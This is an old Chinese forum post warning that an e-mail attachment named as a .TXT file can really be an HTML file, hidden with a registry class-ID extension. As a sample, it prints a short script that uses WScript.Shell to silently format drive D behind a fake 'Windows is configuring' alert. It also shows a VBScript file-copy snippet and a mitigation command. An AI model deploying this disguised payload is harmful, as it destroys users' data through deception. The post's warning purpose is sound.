|
論壇說明 |
歡迎您來到『史萊姆論壇』 ^___^ 您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的! 請點擊這裡:『註冊成為我們的一份子!』 |
|
主題工具 | 顯示模式 |
2005-10-18, 08:40 AM | #1 |
榮譽會員
|
淺談TXT文件的安全性
淺談TXT文件的安全性
大家都知道,現在大多數病毒的傳播媒介都是可執行文件或指令碼文件,但當你收到一分附件為.TXT為後面名的郵件時,你會不會有所警覺呢?在一定程度上也可以造成破壞!由於目前大多數人使用的是Windows系列的操作系統,而Windows設定是隱藏已知文件副檔名。當你點擊那個看上去很友善的文件時,那些破壞性的東西就會一一跳了出來。 假如你收到一分郵件,附件裡的檔案名為「美媚大放送.TXT」,你是不是會認定他肯定是純文本文件呢?那可不一定哦!它的實際檔案名可以是「美媚大放送.TXT.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}」。其中的「{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}」在註冊表裡的含義是HTML文件關聯。但是存成文件時它就不會顯現出來,你看到的這個.TXT文件其實就是「美媚大放送.TXT.HTML」。那麼開啟這個文件又會有什麼危害呢?如果這個文件的內容如下(警告:以下程式碼可能帶有攻擊性,禁止亂用,一切使用後過自負!): 〈script〉 a=new ActiveXObject("WSCript.Shell"); a.run("format.com D:/q /autotest /u"); alert("Windows is configuring the system. Please do not interrupt this process."); 〈/script〉 那麼它就會使用IE執行FORMAT指令,同時顯示「Windows is configuring the system. Please do not interrupt this process.」,哈哈,這下你可就慘了。要注意哦~ 大家大概已經注意到第二行的「WSCript」了吧,對啊,就是它在導演著這場戲。 WSCript全稱「Windows Scripting Host」,它是Windows 98新增的功能,是一種批次語言/自動執行工具——它所對應的程序「WSCript.exe」是一個指令碼語言解釋器,為於WINDOWS目錄下,正是它才使得指令碼可以被執行,就像執行批次處理一樣。在Windows Scripting Host指令碼環境裡,預定義了一些對象,通過它原有的的幾個對象,可以實現獲取環境變數、建立捷徑、載入程序、讀寫註冊表等功能。 下面我們通過一個小的例子來說明WSCript的功能是如何的強大,而使用又是何等的簡單,被人利用的威脅有是如何之大。例如有一個.vbs文件: Set so=CreatObject(Scripting.FileSystemObject") so.GetFile(c:\Windows\winipcfg.exe).Copy("e:\winipcfg.exe") 這麼短短的兩行就可以COPY一個文件到指定位置。第一行:新增一個文件系統對像;第二行:開啟指令碼文件,c:\Windows\winipcfg.exe指明這個程序本身,是一個完整的路徑檔案名。GetFile函數獲得這個文件,Copy函數將這個文件複製到E碟根目錄下。這也是現今大多數利用VBscript編寫的病毒的一個特點。由此可以看出禁止FileSystemObject對象就可以有效地控制這種病毒的傳播。禁止FileSystemObject對象可用如下指令: regsvr32 scrrun.dll /u 好了,只寫這些了,最後還要說一句,OUTLOOK問題多多,少用為好,建議收發信使用FoxMail,同時也支持一下國產軟體! |
__________________ |
|
送花文章: 3,
|